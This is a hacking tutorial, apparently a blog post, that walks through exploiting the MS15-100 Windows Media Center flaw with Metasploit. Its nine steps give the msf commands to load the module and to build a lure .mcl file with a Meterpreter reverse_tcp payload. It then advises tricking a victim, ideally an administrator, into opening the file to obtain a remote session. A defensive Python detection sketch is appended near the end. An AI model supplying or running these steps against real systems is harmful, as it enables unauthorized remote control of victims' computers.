How to Hack Windows Vista, 7 & 8 Using Kali Linux

Microsoft Security Bulletin MS15-100 - Important

Here is what Microsoft said about this vulnerability (MS15-100) in their Microsoft Security Bulletin on TechNet:

Although the vulnerability has been patched, many systems don't have automatic patching for a number of reasons, especially within corporate, large institution, and military installations.


Just a warning: this hack is not for the newbie. It requires significant knowledge of both Linux and Metasploit to work.

Step 1: Fire up Kali

Our first step, of course, is to fire up Kali. This exploit requires that you have Ruby 2.1 on your Kali system, so if you are using Kali 1.1 or earlier, you will need to upgrade your Ruby. Kali 2.0 has the upgraded Ruby, so there's no need to upgrade.

Step 2: Go to Exploit-DB

Next, let's go to the Exploit-DB. Under the Remote Code Execution Exploits section, we can find the exploit under its Microsoft designation, MS15-100.



When we select this exploit, it brings up the Metasploit code that we must add to our Metasploit framework. Copy and paste it to a text file in Kali.



Step 3: Add New Module to Metasploit

Earlier this year, I wrote a tutorial on How to install new module in Metasploit, so please refer to that if you need more help on this subject. You will need to add this module to your Metasploit framework before we can proceed. Name it ms15_100_mcl.rb. It may be that by the time you read this article, Rapid7 will have added this module to the framework and you won't need to add the module, but time is critical here.

Step 4: Start Metasploit & Search for New Module

Once you have added the module to Metasploit, start (or restart) Metasploit and search for the module to make certain it is available to you.

msf > search ms15_100


If you find it, we are ready to roll!

Step 5: Load New Module

We now need to load the module:

msf > use exploit/windows/fileformat/ms15_100_mcl

This loads this exploit into memory.

Step 6: Info

Now that we have loaded the module, let's type info to see what requirements this module needs.

msf > info



As you can see, we need to provide this module both the FILENAME and FILE_NAME. One is the .mcl file (FILENAME) and the other is the malicious file (FILE_NAME) we will load on to the victim's system.

Step 7: Set Options

As you can see in the screenshot above, this module will require that we set the name of the .mcl file (FILENAME) and the name of malicious payload (FILE_NAME). In an attempt to entice the victim to open my .mcl link, I'll call it best_music_video_ever.mcl.

msf > set FILENAME best_music_video_ever.mcl

msf > set FILE_NAME best_video.exe

We also need to set a payload. In this case, I will use the Windows Meterpreter.

msf > set PAYLOAD windows/meterpreter/reverse_tcp



Finally, we just type exploit.

msf > exploit



Metasploit saved the file at /root/msf4/local/best_music_video_ever.mcl. That is the file we need to get to the victim!

Step 8: Send the MCL File to the Victim

Metasploit has now created our .mcl file and opened a share on the network. We now need to send this file, one way or another, to the victim and get them to open it.


Note in the screenshot above that the victim's Windows 7 system has the MCL file, best_music_video_ever.mcl, on their desktop.

Step 9: Take Control of the System

When the victim clicks on the .mcl link to watch the "Best Music Video Ever," it will connect back to our Kali system opening a Meterpreter session. In my case, the session did not automatically open in Metasploit, but when I typed:

msf > sessions -l

I received this response showing me that a session had been opened on the victim machine. Success!



Now that I have a Meterpreter session, I can do just about anything on this system within the privileges I came in on. Since this exploit comes in with the privileges of the user, I will be limited to the privileges of the user who clicked on the .mcl file. Obviously, if we can get an administrator to click on this file, we will come in with their privileges, which would be much more powerful.
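Seen from the defender's side, Steps 8 and 9 leave a correlatable trail: an .mcl file is opened, the Media Center process starts a binary from a network share, and that binary makes an outbound connection. The following detection sketch is an added example, not part of the original tutorial; the event field names, the five-minute window, and the use of ehshell.exe as the Media Center host process are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed correlation window
HANDLER = "ehshell.exe"         # assumed: Windows Media Center host process

# Constructed sample telemetry (not real logs); field names are hypothetical.
EVENTS = [
    {"ts": "2015-09-20T10:00:01", "host": "WS01", "type": "proc",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\ehome\ehshell.exe",
     "cmdline": r'ehshell.exe "C:\Users\bob\Desktop\clip.mcl"'},
    {"ts": "2015-09-20T10:00:04", "host": "WS01", "type": "proc",
     "parent": r"C:\Windows\ehome\ehshell.exe",
     "image": r"\\203.0.113.7\share\viewer.exe", "cmdline": r"\\203.0.113.7\share\viewer.exe"},
    {"ts": "2015-09-20T10:00:06", "host": "WS01", "type": "net",
     "image": r"\\203.0.113.7\share\viewer.exe", "dest": "203.0.113.7:8443"},
    {"ts": "2015-09-20T11:30:00", "host": "WS02", "type": "proc",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\ehome\ehshell.exe",
     "cmdline": "ehshell.exe"},
]

def _t(event):
    return datetime.fromisoformat(event["ts"])

def detect(events):
    """Return (host, image, severity) for each UNC-path binary the handler starts after an .mcl open."""
    events = sorted(events, key=_t)
    alerts = []
    for opened in events:
        if opened["type"] != "proc" or ".mcl" not in opened["cmdline"].lower():
            continue
        for child in events:
            if (child["type"] == "proc" and child["host"] == opened["host"]
                    and child["parent"].lower().endswith(HANDLER)
                    and child["image"].startswith("\\\\")      # image lives on a network share
                    and timedelta(0) <= _t(child) - _t(opened) <= WINDOW):
                # Escalate when the same remote binary also opens a network connection.
                beacon = any(n["type"] == "net" and n["host"] == child["host"]
                             and n["image"].lower() == child["image"].lower()
                             and timedelta(0) <= _t(n) - _t(child) <= WINDOW
                             for n in events)
                alerts.append((child["host"], child["image"],
                               "high" if beacon else "medium"))
    return alerts
```

Because the session runs with the privileges of the user who opened the file, a "high" alert on an administrator's workstation deserves the fastest response.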


Comments

  1. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.